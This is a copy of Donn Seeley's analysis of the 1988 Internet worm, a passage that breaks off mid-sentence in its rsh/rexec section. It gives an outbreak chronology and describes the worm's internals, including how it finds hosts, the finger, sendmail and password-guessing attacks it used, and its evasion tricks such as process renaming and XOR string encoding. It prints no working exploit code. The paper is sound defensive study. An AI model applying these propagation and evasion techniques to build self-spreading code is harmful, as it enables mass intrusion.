textfiles/internet/tour.crt



                       _ A _ T_ o_ u_ r _ o_ f _ t_ h_ e _ W_ o_ r_ m

                           _ D_ o_ n_ n _ S_ e_ e_ l_ e_ y
 9                 Department of Computer Science
                       University of Utah

 9                            _ A_ B_ S_ T_ R_ A_ C_ T


    On the evening of November 2,  1988,  a  self-replicating
    program was released upon the Internet[1].  This  program
    (a _ w_ o_ r_ m) invaded VAX and Sun-3 computers running versions
    of Berkeley UNIX, and  used  their  resources  to  attack
    still more computers[2].  Within the space of hours  this
    program had spread across the U.S., infecting hundreds or
    thousands of computers and making many of  them  unusable
    due to the burden of its activity.  This paper provides a
    chronology for  the  outbreak  and  presents  a  detailed
    description  of  the  internals of the worm, based on a C
    version produced by decompiling.


_ 1.  _ I_ n_ t_ r_ o_ d_ u_ c_ t_ i_ o_ n

    There is a fine line between helping administrators  pro-
    tect their systems and providing a cookbook for bad guys.
    [Grampp and Morris, ``UNIX Operating System Security'']


     November 3, 1988 is already coming to be known as Black
Thursday.  System administrators around the country came to work
on that day and discovered that their networks of computers were
laboring under a huge load.  If they were able to log in and gen-
erate a system status listing, they saw what appeared to be
dozens or hundreds of ``shell'' (command interpreter) processes.
If they tried to kill the processes, they found that new
processes appeared faster than they could kill them.  Rebooting
____________________
 9   [1] The Internet is a logical network made up of many physical
networks, all running the IP class of network protocols.
   [2]  VAX  and  Sun-3  are models of computers built by Digital
Equipment Corp. and Sun Microsystems Inc., respectively.  UNIX is
a Registered Bell of AT&T Trademark Laboratories.


 9


Tour of the Worm                                                2


the computer seemed to have no effect--within minutes after
starting up again, the machine was overloaded by these mysterious
processes.

     These systems had been invaded by a _ w_ o_ r_ m.  A worm is a pro-
gram that propagates itself across a network, using resources on
one machine to attack other machines.  (A worm is not quite the
same as a _ v_ i_ r_ u_ s, which is a program fragment that inserts itself
into other programs.) The worm had taken advantage of lapses in
security on systems that were running 4.2 or 4.3 BSD UNIX or
derivatives like SunOS.  These lapses allowed it to connect to
machines across a network, bypass their login authentication,
copy itself and then proceed to attack still more machines.  The
massive system load was generated by multitudes of worms trying
to propagate the epidemic.

     The Internet had never been attacked in this way before,
although there had been plenty of speculation that an attack was
in store.  Most system administrators were unfamiliar with the
concept of worms (as opposed to viruses, which are a major affl-
iction of the PC world) and it took some time before they were
able to establish what was going on and how to deal with it.
This paper is intended to let people know exactly what happened
and how it came about, so that they will be better prepared when
it happens the next time.  The behavior of the worm will be exam-
ined in detail, both to show exactly what it did and didn't do,
and to show the dangers of future worms.  The epigraph above is
now ironic, for the author of the worm used information in that
paper to attack systems.  Since the information is now well
known, by virtue of the fact that thousands of computers now have
copies of the worm, it seems unlikely that this paper can do
similar damage, but it is definitely a troubling thought.  Opin-
ions on this and other matters will be offered below.

_ 2.  _ C_ h_ r_ o_ n_ o_ l_ o_ g_ y

    Remember, when you connect with another computer,  you're
    connecting  to every computer that computer has connected
    to.  [Dennis Miller, on NBC's _ S_ a_ t_ u_ r_ d_ a_ y _ N_ i_ g_ h_ t _ L_ i_ v_ e]
 9    Here is the gist of a message I got:  I'm  sorry.   [Andy
    Sudduth,  in  an  anonymous posting to the TCP-IP list on
    behalf of the author of the worm, 11/3/88]


     Many details of the chronology of the attack are not yet
available.  The following list represents dates and times that we
are currently aware of.  Times have all been rendered in Pacific
Standard Time for convenience.

11/2: 1800 (approx.)
              This date and time were seen on worm files found on
              _ p_ r_ e_ p._ a_ i._ m_ i_ t._ e_ d_ u, a VAX 11/750 at the MIT Artificial


 9


Tour of the Worm                                                3


              Intelligence Laboratory.  The files were removed
              later, and the precise time was lost.  System log-
              ging on _ p_ r_ e_ p had been broken for two weeks.  The
              system doesn't run accounting and the disks aren't
              backed up to tape: a perfect target.  A number of
              ``tourist'' users (individuals using public
              accounts) were reported to be active that evening.
              These users would have appeared in the session log-
              ging, but see below.

11/2: 1824    First known West Coast infection: _ r_ a_ n_ d._ o_ r_ g at Rand
              Corp. in Santa Monica.

11/2: 1904    _ c_ s_ g_ w._ b_ e_ r_ k_ e_ l_ e_ y._ e_ d_ u is infected.  This machine is a
              major network gateway at UC Berkeley.  Mike Karels
              and Phil Lapsley discover the infection shortly
              afterward.

11/2: 1954    _ m_ i_ m_ s_ y._ u_ m_ d._ e_ d_ u is attacked through its _ f_ i_ n_ g_ e_ r
              server.  This machine is at the University of Mary-
              land College Park Computer Science Department.

11/2: 2000 (approx.)
              Suns at the MIT AI Lab are attacked.

11/2: 2028    First _ s_ e_ n_ d_ m_ a_ i_ l attack on mimsy.

11/2: 2040    Berkeley staff figure out the _ s_ e_ n_ d_ m_ a_ i_ l and _ r_ s_ h
              attacks, notice _ t_ e_ l_ n_ e_ t and _ f_ i_ n_ g_ e_ r peculiarities,
              and start shutting these services off.

11/2: 2049    _ c_ s._ u_ t_ a_ h._ e_ d_ u is infected.  This VAX 8600 is the cen-
              tral Computer Science Department machine at the
              University of Utah.  The next several entries fol-
              low documented events at Utah and are representa-
              tive of other infections around the country.

11/2: 2109    First _ s_ e_ n_ d_ m_ a_ i_ l attack at _ c_ s._ u_ t_ a_ h._ e_ d_ u.

11/2: 2121    The load average on _ c_ s._ u_ t_ a_ h._ e_ d_ u reaches 5.  The
              ``load average'' is a system-generated value that
              represents the average number of jobs in the run
              queue over the last minute; a load of 5 on a VAX
              8600 noticeably degrades response times, while a
              load over 20 is a drastic degradation.  At 9 PM,
              the load is typically between 0.5 and 2.

11/2: 2141    The load average on _ c_ s._ u_ t_ a_ h._ e_ d_ u reaches 7.

11/2: 2201    The load average on _ c_ s._ u_ t_ a_ h._ e_ d_ u reaches 16.

11/2: 2206    The maximum number of distinct runnable processes
              (100) is reached on _ c_ s._ u_ t_ a_ h._ e_ d_ u; the system is


Tour of the Worm                                                4


              unusable.

11/2: 2220    Jeff Forys at Utah kills off worms on _ c_ s._ u_ t_ a_ h._ e_ d_ u.
              Utah Sun clusters are infected.

11/2: 2241    Re-infestation causes the load average to reach 27
              on _ c_ s._ u_ t_ a_ h._ e_ d_ u.

11/2: 2249    Forys shuts down _ c_ s._ u_ t_ a_ h._ e_ d_ u.

11/3: 2321    Re-infestation causes the load average to reach 37
              on _ c_ s._ u_ t_ a_ h._ e_ d_ u, despite continuous efforts by Forys
              to kill worms.

11/2: 2328    Peter Yee at NASA Ames Research Center posts a
              warning to the TCP-IP mailing list: ``We are
              currently under attack from an Internet VIRUS.  It
              has hit UC Berkeley, UC San Diego, Lawrence Liver-
              more, Stanford, and NASA Ames.'' He suggests turn-
              ing off _ t_ e_ l_ n_ e_ t, _ f_ t_ p, _ f_ i_ n_ g_ e_ r, _ r_ s_ h and SMTP services.
              He does not mention _ r_ e_ x_ e_ c.  Yee is actually at
              Berkeley working with Keith Bostic, Mike Karels and
              Phil Lapsley.

11/3: 0034    At another's prompting, Andy Sudduth of Harvard
              anonymously posts a warning to the TCP-IP list:
              ``There may be a virus loose on the internet.''
              This is the first message that (briefly) describes
              how the _ f_ i_ n_ g_ e_ r attack works, describes how to
              defeat the SMTP attack by rebuilding _ s_ e_ n_ d_ m_ a_ i_ l, and
              explicitly mentions the _ r_ e_ x_ e_ c attack.  Unfor-
              tunately Sudduth's message is blocked at
              _ r_ e_ l_ a_ y._ c_ s._ n_ e_ t while that gateway is shut down to
              combat the worm, and it does not get delivered for
              almost two days.  Sudduth acknowledges authorship
              of the message in a subsequent message to TCP-IP on
              Nov. 5.

11/3: 0254    Keith Bostic sends a fix for _ s_ e_ n_ d_ m_ a_ i_ l to the news-
              group comp.bugs.4bsd.ucb-fixes and to the TCP-IP
              mailing list.  These fixes (and later ones) are
              also mailed directly to important system adminis-
              trators around the country.

11/3: early morning
              The _ w_ t_ m_ p session log is mysteriously removed on
              _ p_ r_ e_ p._ a_ i._ m_ i_ t._ e_ d_ u.

11/3: 0507    Edward Wang at Berkeley figures out and reports the
              _ f_ i_ n_ g_ e_ r attack, but his message doesn't come to Mike
              Karels' attention for 12 hours.

 9

 9


Tour of the Worm                                                5


11/3: 0900    The annual Berkeley Unix Workshop commences at UC
              Berkeley.  40 or so important system administrators
              and hackers are in town to attend, while disaster
              erupts at home.  Several people who had planned to
              fly in on Thursday morning are trapped by the
              crisis.  Keith Bostic spends much of the day on the
              phone at the Computer Systems Research Group
              offices answering calls from panicked system
              administrators from around the country.

11/3: 1500 (approx.)
              The team at MIT Athena calls Berkeley with an exam-
              ple of how the _ f_ i_ n_ g_ e_ r server bug works.

11/3: 1626    Dave Pare arrives at Berkeley CSRG offices;
              disassembly and decompiling start shortly afterward
              using Pare's special tools.

11/3: 1800 (approx.)
              The Berkeley group sends out for calzones.  People
              arrive and leave; the offices are crowded, there's
              plenty of excitement.  Parallel work is in progress
              at MIT Athena; the two groups swap code.

11/3: 1918    Keith Bostic posts a fix for the _ f_ i_ n_ g_ e_ r server.

11/4: 0600    Members of the Berkeley team, with the worm almost
              completely disassembled and largely decompiled,
              finally take off for a couple hours' sleep before
              returning to the workshop.

11/4: 1236    Theodore Ts'o of Project Athena at MIT publicly
              announces that MIT and Berkeley have completely
              disassembled the worm.

11/4: 1700 (approx.)
              A short presentation on the worm is made at the end
              of the Berkeley UNIX Workshop.

11/8:         National Computer Security Center meeting to dis-
              cuss the worm.  There are about 50 attendees.

11/11: 0038   Fully decompiled and commented worm source is
              installed at Berkeley.

_ 3.  _ O_ v_ e_ r_ v_ i_ e_ w

     What exactly did the worm do that led it to cause an epi-
demic?  The worm consists of a 99-line bootstrap program written
in the C language, plus a large relocatable object file that
comes in VAX and Sun-3 flavors.  Internal evidence showed that
the object file was generated from C sources, so it was natural
to decompile the binary machine language into C; we now have over


Tour of the Worm                                                6


3200 lines of commented C code which recompiles and is mostly
complete.  We shall start the tour of the worm with a quick over-
view of the basic goals of the worm, followed by discussion in
depth of the worm's various behaviors as revealed by decompila-
tion.

     The activities of the worm break down into the categories of
attack and defense.  Attack consists of locating hosts (and
accounts) to penetrate, then exploiting security holes on remote
systems to pass across a copy of the worm and run it.  The worm
obtains host addresses by examining the system tables
/_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v and /._ r_ h_ o_ s_ t_ s, user files like ._ f_ o_ r_ w_ a_ r_ d and
._ r_ h_ o_ s_ t_ s, dynamic routing information produced by the _ n_ e_ t_ s_ t_ a_ t pro-
gram, and finally randomly generated host addresses on local net-
works.  It ranks these by order of preference, trying a file like
/_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v first because it contains names of local
machines that are likely to permit unauthenticated connections.
Penetration of a remote system can be accomplished in any of
three ways.  The worm can take advantage of a bug in the _ f_ i_ n_ g_ e_ r
server that allows it to download code in place of a finger
request and trick the server into executing it.  The worm can use
a ``trap door'' in the _ s_ e_ n_ d_ m_ a_ i_ l SMTP mail service, exercising a
bug in the debugging code that allows it to execute a command
interpreter and download code across a mail connection.  If the
worm can penetrate a local account by guessing its password, it
can use the _ r_ e_ x_ e_ c and _ r_ s_ h remote command interpreter services to
attack hosts that share that account.  In each case the worm
arranges to get a remote command interpreter which it can use to
copy over, compile and execute the 99-line bootstrap.  The
bootstrap sets up its own network connection with the local worm
and copies over the other files it needs, and using these pieces
a remote worm is built and the infection procedure starts over
again.

     Defense tactics fall into three categories: preventing the
detection of intrusion, inhibiting the analysis of the program,
and authenticating other worms.  The worm's simplest means of
hiding itself is to change its name.  When it starts up, it
clears its argument list and sets its zeroth argument to _ s_ h,
allowing it to masquerade as an innocuous command interpreter.
It uses _ f_ o_ r_ k() to change its process I.D., never staying too long
at one I.D.  These two tactics are intended to disguise the
worm's presence on system status listings.  The worm tries to
leave as little trash lying around as it can, so at start-up it
reads all its support files into memory and deletes the tell-tale
filesystem copies.  It turns off the generation of _ c_ o_ r_ e files, so
if the worm makes a mistake, it doesn't leave evidence behind in
the form of core dumps.  The latter tactic is also designed to
block analysis of the program--it prevents an administrator from
sending a software signal to the worm to force it to dump a core
file.  There are other ways to get a core file, however, so the
worm carefully alters character data in memory to prevent it from
being extracted easily.  Copies of disk files are encoded by


Tour of the Worm                                                7


repeatedly exclusive-or'ing a ten-byte code sequence; static
strings are encoded byte-by-byte by exclusive-or'ing with the
hexadecimal value 81, except for a private word list which is
encoded with hexadecimal 80 instead.  If the worm's files are
somehow captured before the worm can delete them, the object
files have been loaded in such a way as to remove most non-
essential symbol table entries, making it harder to guess at the
purposes of worm routines from their names.  The worm also makes
a trivial effort to stop other programs from taking advantage of
its communications; in theory a well-prepared site could prevent
infection by sending messages to ports that the worm was listen-
ing on, so the worm is careful to test connections using a short
exchange of random ``magic numbers''.

     When studying a tricky program like this, it's just as
important to establish what the program _ d_ o_ e_ s _ n_ o_ t do as what it
does do.  The worm _ d_ o_ e_ s _ n_ o_ t _ d_ e_ l_ e_ t_ e _ a _ s_ y_ s_ t_ e_ m'_ s _ f_ i_ l_ e_ s: it only
removes files that it created in the process of bootstrapping.
The program does not attempt to incapacitate a system by deleting
important files, or indeed any files.  It does not remove log
files or otherwise interfere with normal operation other than by
consuming system resources.  The worm _ d_ o_ e_ s _ n_ o_ t _ m_ o_ d_ i_ f_ y _ e_ x_ i_ s_ t_ i_ n_ g
_ f_ i_ l_ e_ s: it is not a virus.  The worm propagates by copying itself
and compiling itself on each system; it does not modify other
programs to do its work for it.  Due to its method of infection,
it can't count on sufficient privileges to be able to modify pro-
grams.  The worm _ d_ o_ e_ s _ n_ o_ t _ i_ n_ s_ t_ a_ l_ l _ t_ r_ o_ j_ a_ n _ h_ o_ r_ s_ e_ s: its method of
attack is strictly active, it never waits for a user to trip over
a trap.  Part of the reason for this is that the worm can't
afford to waste time waiting for trojan horses--it must reproduce
before it is discovered.  Finally, the worm _ d_ o_ e_ s _ n_ o_ t _ r_ e_ c_ o_ r_ d _ o_ r
_ t_ r_ a_ n_ s_ m_ i_ t _ d_ e_ c_ r_ y_ p_ t_ e_ d _ p_ a_ s_ s_ w_ o_ r_ d_ s: except for its own static list of
favorite passwords, the worm does not propagate cracked passwords
on to new worms nor does it transmit them back to some home base.
This is not to say that the accounts that the worm penetrated are
secure merely because the worm did not tell anyone what their
passwords were, of course--if the worm can guess an account's
password, certainly others can too.  The worm _ d_ o_ e_ s _ n_ o_ t _ t_ r_ y _ t_ o
_ c_ a_ p_ t_ u_ r_ e _ s_ u_ p_ e_ r_ u_ s_ e_ r _ p_ r_ i_ v_ i_ l_ e_ g_ e_ s: while it does try to break into
accounts, it doesn't depend on having particular privileges to
propagate, and never makes special use of such privileges if it
somehow gets them.  The worm _ d_ o_ e_ s _ n_ o_ t _ p_ r_ o_ p_ a_ g_ a_ t_ e _ o_ v_ e_ r _ u_ u_ c_ p or X.25
or DECNET or BITNET: it specifically requires TCP/IP.  The worm
_ d_ o_ e_ s _ n_ o_ t _ i_ n_ f_ e_ c_ t _ S_ y_ s_ t_ e_ m _ V _ s_ y_ s_ t_ e_ m_ s unless they have been modified
to use Berkeley network programs like _ s_ e_ n_ d_ m_ a_ i_ l, _ f_ i_ n_ g_ e_ r_ d and
_ r_ e_ x_ e_ c.

_ 4.  _ I_ n_ t_ e_ r_ n_ a_ l_ s

     Now for some details: we shall follow the main thread of
control in the worm, then examine some of the worm's data struc-
tures before working through each phase of activity.
 9

 9


Tour of the Worm                                                8


_ 4._ 1.  _ T_ h_ e _ t_ h_ r_ e_ a_ d _ o_ f _ c_ o_ n_ t_ r_ o_ l

     When the worm starts executing in _ m_ a_ i_ n(), it takes care of
some initializations, some defense and some cleanup.  The very
first thing it does is to change its name to _ s_ h.  This shrinks
the window during which the worm is visible in a system status
listing as a process with an odd name like _ x_ 9_ 8_ 3_ 4_ 7_ 5_ 3.  It then
initializes the random number generator, seeding it with the
current time, turns off core dumps, and arranges to die when
remote connections fail.  With this out of the way, the worm
processes its argument list.  It first looks for an option -_ p $$,
where $$ represents the process I.D. of its parent process; this
option indicates to the worm that it must take care to clean up
after itself.  It proceeds to read in each of the files it was
given as arguments; if cleaning up, it removes each file after it
reads it.  If the worm wasn't given the bootstrap source file
_ l_ 1._ c as an argument, it exits silently; this is perhaps intended
to slow down people who are experimenting with the worm.  If
cleaning up, the worm then closes its file descriptors, tem-
porarily cutting itself off from its remote parent worm, and
removes some files.  (One of these files, /_ t_ m_ p/._ d_ u_ m_ b, is never
created by the worm and the unlinking seems to be left over from
an earlier stage of development.) The worm then zeroes out its
argument list, again to foil the system status program _ p_ s.  The
next step is to initialize the worm's list of network interfaces;
these interfaces are used to find local networks and to check for
alternate addresses of the current host.  Finally, if cleaning up
the worm resets its process group and kills the process that
helped to bootstrap it.  The worm's last act in _ m_ a_ i_ n() is to call
a function we named _ d_ o_ i_ t(), which contains the main loop of the
worm.

     _ d_ o_ i_ t() runs a short prologue before actually starting the
main loop.  It (redundantly) seeds the random number generator
with the current time, saving the time so that it can tell how
long it has been running.  The worm then attempts its first
infection.  It initially attacks gateways that it found with the
_ n_ e_ t_ s_ t_ a_ t network status program; if it can't infect one of these
hosts, then it checks random host numbers on local networks, then
it tries random host numbers on networks that are on the far side
of gateways, in each case stopping if it succeeds.  (Note that
this sequence of attacks differs from the sequence the worm uses
after it has entered the main loop.)

     After this initial attempt at infection, the worm calls the
routine _ c_ h_ e_ c_ k_ o_ t_ h_ e_ r() to check for another worm already on the
local machine.  In this check the worm acts as a client to an
existing worm which acts as a server; they may exchange ``popula-
tion control'' messages, after which one of the two worms will
eventually shut down.

     One odd routine is called just before entering the main
loop.  We named this routine _ s_ e_ n_ d__ m_ e_ s_ s_ a_ g_ e(), but it really


Tour of the Worm                                                9


_________________________________________________________________

 9          doit() {
              _ s_ e_ e_ d _ t_ h_ e _ r_ a_ n_ d_ o_ m _ n_ u_ m_ b_ e_ r _ g_ e_ n_ e_ r_ a_ t_ o_ r _ w_ i_ t_ h _ t_ h_ e _ t_ i_ m_ e
              _ a_ t_ t_ a_ c_ k _ h_ o_ s_ t_ s: _ g_ a_ t_ e_ w_ a_ y_ s, _ l_ o_ c_ a_ l _ n_ e_ t_ s, _ r_ e_ m_ o_ t_ e _ n_ e_ t_ s
              checkother();
              send_message();
              for (;;) {
                  cracksome();
                  other_sleep(30);
                  cracksome();
                  _ c_ h_ a_ n_ g_ e _ o_ u_ r _ p_ r_ o_ c_ e_ s_ s _ I_ D
                  _ a_ t_ t_ a_ c_ k _ h_ o_ s_ t_ s: _ g_ a_ t_ e_ w_ a_ y_ s, _ k_ n_ o_ w_ n _ h_ o_ s_ t_ s,
                      _ r_ e_ m_ o_ t_ e _ n_ e_ t_ s, _ l_ o_ c_ a_ l _ n_ e_ t_ s
                  other_sleep(120);
                  _ i_ f _ 1_ 2 _ h_ o_ u_ r_ s _ h_ a_ v_ e _ p_ a_ s_ s_ e_ d,
                      _ r_ e_ s_ e_ t _ h_ o_ s_ t_ s _ t_ a_ b_ l_ e
                  if (pleasequit && nextw > 10)
                      exit(0);
              }
          }

            ``_ C'' _ p_ s_ e_ u_ d_ o-_ c_ o_ d_ e _ f_ o_ r _ t_ h_ e _ d_ o_ i_ t() _ f_ u_ n_ c_ t_ i_ o_ n

_________________________________________________________________


doesn't send anything at all.  It looks like it was intended to
cause 1 in 15 copies of the worm to send a 1-byte datagram to a
port on the host _ e_ r_ n_ i_ e._ b_ e_ r_ k_ e_ l_ e_ y._ e_ d_ u, which is located in the Com-
puter Science Department at UC Berkeley.  It has been suggested
that this was a feint, designed to draw attention to _ e_ r_ n_ i_ e and
away from the author's real host.  Since the routine has a bug
(it sets up a TCP socket but tries to send a UDP packet), nothing
gets sent at all.  It's possible that this was a deeper feint,
designed to be uncovered only by decompilers; if so, this
wouldn't be the only deliberate impediment that the author put in
our way.  In any case, administrators at Berkeley never detected
any process listening at port 11357 on ernie, and we found no
code in the worm that listens at that port, regardless of the
host.

     The main loop begins with a call to a function named _ c_ r_ a_ c_ k_ -
_ s_ o_ m_ e() for some password cracking.  Password cracking is an
activity that the worm is constantly working at in an incremental
fashion.  It takes a break for 30 seconds to look for intruding
copies of the worm on the local host, and then goes back to
cracking.  After this session, it forks (creates a new process
running with a copy of the same image) and the old process exits;
this serves to turn over process I.D. numbers and makes it harder
to track the worm with the system status program _ p_ s.  At this


 9


Tour of the Worm                                               10


point the worm goes back to its infectious stage, trying (in
order of preference) gateways, hosts listed in system tables like
/_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v, random host numbers on the far side of gateways
and random hosts on local networks.  As before, if it succeeds in
infecting a new host, it marks that host in a list and leaves the
infection phase for the time being.  After infection, the worm
spends two minutes looking for new local copies of the worm
again; this is done here because a newly infected remote host may
try to reinfect the local host.  If 12 hours have passed and the
worm is still alive, it assumes that it has had bad luck due to
networks or hosts being down, and it reinitializes its table of
hosts so that it can start over from scratch.  At the end of the
main loop the worm checks to see if it is scheduled to die as a
result of its population control features, and if it is, and if
it has done a sufficient amount of work cracking passwords, it
exits.

_ 4._ 2.  _ D_ a_ t_ a _ s_ t_ r_ u_ c_ t_ u_ r_ e_ s

     The worm maintains at least four interesting data struc-
tures, and each is associated with a set of support routines.

     The _ o_ b_ j_ e_ c_ t structure is used to hold copies of files.  Files
are encrypted using the function _ x_ o_ r_ b_ u_ f() while in memory, so
that dumps of the worm won't reveal anything interesting.  The
files are copied to disk on a remote system before starting a new
worm, and new worms read the files into memory and delete the
disk copies as part of their start-up duties.  Each structure
contains a name, a length and a pointer to a buffer.  The func-
tion _ g_ e_ t_ o_ b_ j_ e_ c_ t_ b_ y_ n_ a_ m_ e() retrieves a pointer to a named object
structure; for some reason, it is only used to call up the
bootstrap source file.

     The _ i_ n_ t_ e_ r_ f_ a_ c_ e structure contains information about the
current host's network interfaces.  This is mainly used to check
for local attached networks.  It contains a name, a network
address, a subnet mask and some flags.  The interface table is
initialized once at start-up time.

     The _ h_ o_ s_ t structure is used to keep track of the status and
addresses of hosts.  Hosts are added to this list dynamically, as
the worm encounters new sources of host names and addresses.  The
list can be searched for a particular address or name, with an
option to insert a new entry if no matching entry is found.  Flag
bits are used to indicate whether the host is a gateway, whether
it was found in a system table like /_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v, whether the
worm has found it impossible to attack the host for some reason,
and whether the host has already been successfully infected.  The
bits for ``can't infect'' and ``infected'' are cleared every 12
hours, and low priority hosts are deleted, to be accumulated
again later.  The structure contains up to 12 names (aliases) and
up to 6 distinct network addresses for each host.
 9

 9


Tour of the Worm                                               11


     In our sources, what we've called the _ m_ u_ c_ k structure is used
to keep track of accounts for the purpose of password cracking.
(It was awarded the name _ m_ u_ c_ k for sentimental reasons, although
_ p_ w or _ a_ c_ c_ t might be more mnemonic.) Each structure contains an
account name, an encrypted password, a decrypted password (if
available) plus the home directory and personal information
fields from the password file.

_ 4._ 3.  _ P_ o_ p_ u_ l_ a_ t_ i_ o_ n _ g_ r_ o_ w_ t_ h

     The worm contains a mechanism that seems to be designed to
limit the number of copies of the worm running on a given system,
but beyond that our current understanding of the design goals is
itself limited.  It clearly does not prevent a system from being
overloaded, although it does appear to pace the infection so that
early copies can go undetected.  It has been suggested that a
simulation of the worm's population control features might reveal
more about its design, and we are interested writing such a simu-
lation.

     The worm uses a client-and-server technique to control the
number of copies executing on the current machine.  A routine
_ c_ h_ e_ c_ k_ o_ t_ h_ e_ r() is run at start-up time.  This function tries to
connect to a server listening at TCP port 23357.  The connection
attempt returns immediately if no server is present, but blocks
if one is available and busy; a server worm periodically runs its
server code during time-consuming operations so that the queue of
connections does not grow large.  After the client exchanges
magic numbers with the server as a trivial form of authentica-
tion, the client and the server roll dice to see who gets to sur-
vive.  If the exclusive-or of the respective low bits of the
client's and the server's random numbers is 1, the server wins,
otherwise the client wins.  The loser sets a flag _ p_ l_ e_ a_ s_ e_ q_ u_ i_ t that
eventually allows it to exit at the bottom of the main loop.  If
at any time a problem occurs--a read from the server fails, or
the wrong magic number is returned--the client worm returns from
the function, becoming a worm that never acts as a server and
hence does not engage in population control.  Perhaps as a pre-
caution against a cataleptic server, a test at the top of the
function causes 1 in 7 worms to skip population control.  Thus
the worm finishes the population game in _ c_ h_ e_ c_ k_ o_ t_ h_ e_ r() in one of
three states: scheduled to die after some time, with _ p_ l_ e_ a_ s_ e_ q_ u_ i_ t
set; running as a server, with the possibility of losing the game
later; and immortal, safe from the gamble of population control.

     A complementary routine _ o_ t_ h_ e_ r__ s_ l_ e_ e_ p() executes the server
function.  It is passed a time in seconds, and it uses the Berke-
ley _ s_ e_ l_ e_ c_ t() system call to wait for that amount of time accept-
ing connections from clients.  On entry to the function, it tests
to see whether it has a communications port with which to accept
connections; if not, it simply sleeps for the specified amount of
time and returns.  Otherwise it loops on _ s_ e_ l_ e_ c_ t(), decrementing
its time remaining after serving a client until no more time is


Tour of the Worm                                               12


left and the function returns.  When the server acquires a
client, it performs the inverse of the client's protocol, eventu-
ally deciding whether to proceed or to quit.  _ o_ t_ h_ e_ r__ s_ l_ e_ e_ p() is
called from many different places in the code, so that clients
are not kept waiting too long.

     Given the worm's elaborate scheme for controlling re-
infection, what led it to reproduce so quickly on an individual
machine that it could swamp it?  One culprit is the 1 in 7 test
in _ c_ h_ e_ c_ k_ o_ t_ h_ e_ r(): worms that skip the client phase become immor-
tal, and thus don't risk being eliminated by a roll of the dice.
Another source of system loading is the problem that when a worm
decides it has lost, it can still do a lot of work before it
actually exits.  The client routine isn't even run until the
newly born worm has attempted to infect at least one remote host,
and even if a worm loses the roll, it continues executing to the
bottom of the main loop, and even then it won't exit unless it
has gone through the main loop several times, limited by its pro-
gress in cracking passwords.  Finally, new worms lose all of the
history of infection that their parents had, so the children of a
worm are constantly trying to re-infect the parent's host, as
well as the other children's hosts.  Put all of these factors
together and it comes as no surprise that within an hour or two
after infection, a machine may be entirely devoted to executing
worms.

_ 4._ 4.  _ L_ o_ c_ a_ t_ i_ n_ g _ n_ e_ w _ h_ o_ s_ t_ s _ t_ o _ i_ n_ f_ e_ c_ t

     One of the characteristics of the worm is that all of its
attacks are active, never passive.  A consequence of this is that
the worm can't wait for a user to take it over to another machine
like gum on a shoe--it must search out hosts on its own.

     The worm has a very distinct list of priorities when hunting
for hosts.  Its favorite hosts are gateways; the _ h_ g() routine
tries to infect each of the hosts it believes to be gateways.
Only when all of the gateways are known to be infected or
infection-proof does the worm go on to other hosts.  _ h_ g() calls
the _ r_ t__ i_ n_ i_ t() function to get a list of gateways; this list is
derived by running the _ n_ e_ t_ s_ t_ a_ t network status program and parsing
its output.  The worm is careful to skip the loopback device and
any local interfaces (in the event that the current host is a
gateway); when it finishes, it randomizes the order of the list
and adds the first 20 gateways to the host table to speed up the
initial searches.  It then tries each gateway in sequence until
it finds a host that can be infected, or it runs out of hosts.

     After taking care of gateways, the worm's next priority is
hosts whose names were found in a scan of system files.  At the
start of password cracking, the files /_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v (which
contains names of hosts to which the local host grants user per-
missions without authentication) and /._ r_ h_ o_ s_ t_ s (which contains
names of hosts from which the local host permits remote


Tour of the Worm                                               13


privileged logins) are examined, as are all users' ._ f_ o_ r_ w_ a_ r_ d files
(which list hosts to which mail is forwarded from the current
host).  These hosts are flagged so that they can be scanned ear-
lier than the rest.  The _ h_ i() function is then responsible for
attacking these hosts.

     When the most profitable hosts have been used up, the worm
starts looking for hosts that aren't recorded in files.  The rou-
tine _ h_ l() checks local networks: it runs through the local host's
addresses, masking off the host part and substituting a random
value.  _ h_ a() does the same job for remote hosts, checking alter-
nate addresses of gateways.  Special code handles the ARPAnet
practice of putting the IMP number in the low host bits and the
actual IMP port (representing the host) in the high host bits.
The function that runs these random probes, which we named
_ h_ a_ c_ k__ n_ e_ t_ o_ f(), seems to have a bug that prevents it from attacking
hosts on local networks; this may be due to our own misunder-
standing, of course, but in any case the check of hosts from sys-
tem files should be sufficient to cover all or nearly all of the
local hosts anyway.

     Password cracking is another generator of host names, but
since this is handled separately from the usual host attack
scheme presented here, it will be discussed below with the other
material on passwords.

_ 4._ 5.  _ S_ e_ c_ u_ r_ i_ t_ y _ h_ o_ l_ e_ s

    The first fact to face is that  Unix  was  not  developed
    with   security,  in  any  realistic  sense,  in  mind...
    [Dennis Ritchie, ``On the Security of Unix'']


     This section discusses the TCP services used by the worm to
penetrate systems.  It's a touch unfair to use the quote above
when the implementation of the services we're about to discuss
was distributed by Berkeley rather than Bell Labs, but the senti-
ment is appropriate.  For a long time the balance between secu-
rity and convenience on Unix systems has been tilted in favor of
convenience.  As Brian Reid has said about the break-in at Stan-
ford two years ago: ``Programmer convenience is the antithesis of
security, because it is going to become intruder convenience if
the programmer's account is ever compromised.'' The lesson from
that experience seems to have been forgotten by most people, but
not by the author of the worm.

_ 4._ 5._ 1.  _ R_ s_ h _ a_ n_ d _ r_ e_ x_ e_ c

    These notes describe how the design  of  TCP/IP  and  the
    4.2BSD implementation allow users on untrusted and possi-
    bly very distant hosts to masquerade as users on  trusted
    hosts.   [Robert  T.  Morris,  ``A Weakness in the 4.2BSD
    Unix TCP/IP Software'']


Tour of the Worm                                               14


     _ R_ s_ h and _ r_ e_ x_ e_ c are network services which offer remote com-
mand interpreters.  _ R_ e_ x_ e_ c uses password authentication; _ r_ s_ h
relies on a ``privileged'' originating port and permissions
files.  Two vulnerabilities are exploited by the worm--the likel-
ihood that a remote machine that has an account for a local user
will have the same password as the local account, allowing pene-
tration through _ r_ e_ x_ e_ c, and the likelihood that such a remote
account will include the local host in its _ r_ s_ h permissions files.
Both of these vulnerabilities are really problems with laxness or
convenience for users and system administrators rather than
actual bugs, but they represent avenues for infection just like
inadvertent security bugs.

     The first use of _ r_ s_ h by the worm is fairly simple: it looks
for a remote account with the same name as the one that is
(unsuspectingly) running the worm on the local machine.  This
test is part of the standard menu of hacks conducted for each
